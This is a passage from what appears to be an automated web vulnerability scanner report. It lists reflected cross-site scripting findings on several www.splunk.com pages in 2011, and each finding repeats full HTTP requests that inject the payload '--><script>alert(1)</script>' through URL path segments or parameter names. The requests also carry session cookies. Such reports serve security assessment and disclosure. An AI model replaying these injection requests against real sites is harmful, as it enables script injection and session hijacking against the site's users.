GET /page/securityportal813b2--><script>alert(1)</script>84a6bb363c6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:40 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18244
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.462. http://www.splunk.com/page/securityportal [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/securityportal
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3528--><script>alert(1)</script>e3767e143d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securityportal?b3528--><script>alert(1)</script>e3767e143d0=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:30 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 95b1f862f04ad06426eac2c79742d2b41296943951 Last-Modified: Sat, 05 Feb 2011 22:12:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload bc93f--><script>alert(1)</script>065c36a19ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagebc93f--><script>alert(1)</script>065c36a19ad/sign_up HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ ETag: 10e1869b01f689dcb5cc6dffdff5f4041296943918 Last-Modified: Sat, 05 Feb 2011 22:11:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9ab55--><script>alert(1)</script>0274b98f40b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/sign_up9ab55--><script>alert(1)</script>0274b98f40b HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:26 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.465. http://www.splunk.com/page/sign_up [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/sign_up
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f1a1f--><script>alert(1)</script>58e995154fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/sign_up?f1a1f--><script>alert(1)</script>58e995154fc=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:21 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 621932632d80da436180c3b517f5cfe51296943881 Last-Modified: Sat, 05 Feb 2011 22:11:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 36444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e793d--><script>alert(1)</script>27fe6ecb2fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagee793d--><script>alert(1)</script>27fe6ecb2fa/submit_issue HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ ETag: 71556ab4739ff7dd728f8c22a748b2501296943918 Last-Modified: Sat, 05 Feb 2011 22:11:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 55722--><script>alert(1)</script>48a34806daf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/submit_issue55722--><script>alert(1)</script>48a34806daf HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:28 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18232
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4498a--><script>alert(1)</script>9dced1a1b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page4498a--><script>alert(1)</script>9dced1a1b1/track_issues HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:42 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:42 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:42 GMT; path=/ ETag: 49f98c5d8e5e2ba907c8b57b4a3e6f8b1296943902 Last-Modified: Sat, 05 Feb 2011 22:11:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2c1ab--><script>alert(1)</script>52e32428f4c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/track_issues2c1ab--><script>alert(1)</script>52e32428f4c HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:10 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18232
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload d1796--><script>alert(1)</script>c786baa5caf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /partnersd1796--><script>alert(1)</script>c786baa5caf HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.471. http://www.splunk.com/partners [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/partners
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 562e4--><script>alert(1)</script>27a14dfb8bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /partners?562e4--><script>alert(1)</script>27a14dfb8bd=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:15 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 35d1b--><script>alert(1)</script>538a51777cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
